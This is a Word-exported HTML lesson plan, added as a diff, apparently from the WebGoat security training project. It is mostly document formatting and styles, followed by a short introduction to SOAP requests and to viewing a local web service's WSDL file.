+  <o:Pages>2</o:Pages>
+  <o:Words>303</o:Words>
+  <o:Characters>1728</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>14</o:Lines>
+  <o:Paragraphs>4</o:Paragraphs>
+  <o:CharactersWithSpaces>2027</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/SoapRequest_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/SoapRequest_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Cambria;
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1073741899 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+ /* List Definitions */
+ @list l0
+	{mso-list-id:74865116;
+	mso-list-type:hybrid;
+	mso-list-template-ids:197531764 67698703 67698713 67698715 67698703 67698713 67698715 67698703 67698713 67698715;}
+@list l0:level1
+	{mso-level-tab-stop:36.0pt;
+	mso-level-number-position:left;
+	text-indent:-18.0pt;}
+@list l0:level2
+	{mso-level-tab-stop:72.0pt;
+	mso-level-number-position:left;
+	text-indent:-18.0pt;}
+@list l0:level3
+	{mso-level-tab-stop:108.0pt;
+	mso-level-number-position:left;
+	text-indent:-18.0pt;}
+@list l0:level4
+	{mso-level-tab-stop:144.0pt;
+	mso-level-number-position:left;
+	text-indent:-18.0pt;}
+@list l0:level5
+	{mso-level-tab-stop:180.0pt;
+	mso-level-number-position:left;
+	text-indent:-18.0pt;}
+@list l0:level6
+	{mso-level-tab-stop:216.0pt;
+	mso-level-number-position:left;
+	text-indent:-18.0pt;}
+@list l0:level7
+	{mso-level-tab-stop:252.0pt;
+	mso-level-number-position:left;
+	text-indent:-18.0pt;}
+@list l0:level8
+	{mso-level-tab-stop:288.0pt;
+	mso-level-number-position:left;
+	text-indent:-18.0pt;}
+@list l0:level9
+	{mso-level-tab-stop:324.0pt;
+	mso-level-number-position:left;
+	text-indent:-18.0pt;}
+@list l1
+	{mso-list-id:1931350217;
+	mso-list-template-ids:880683430;}
+ol
+	{margin-bottom:0cm;}
+ul
+	{margin-bottom:0cm;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="5122"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Create a SOAP Request<o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><!-- Start Instructions -->Web
+Services communicate through the use of SOAP requests. These requests are
+submitted to a web service in an attempt to execute a function defined in the
+web service definition language (WSDL). Let's learn something about WSDL files.
+Check out WebGoat's web service description language (WSDL) file. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try
+connecting to the WSDL with a browser or Web Service tool. The URL for the web
+service is: http://localhost/WebGoat/services/SoapRequest The WSDL can usually
+be viewed by adding a ?WSDL on the end of the web service request.<o:p></o:p></span></p>
+
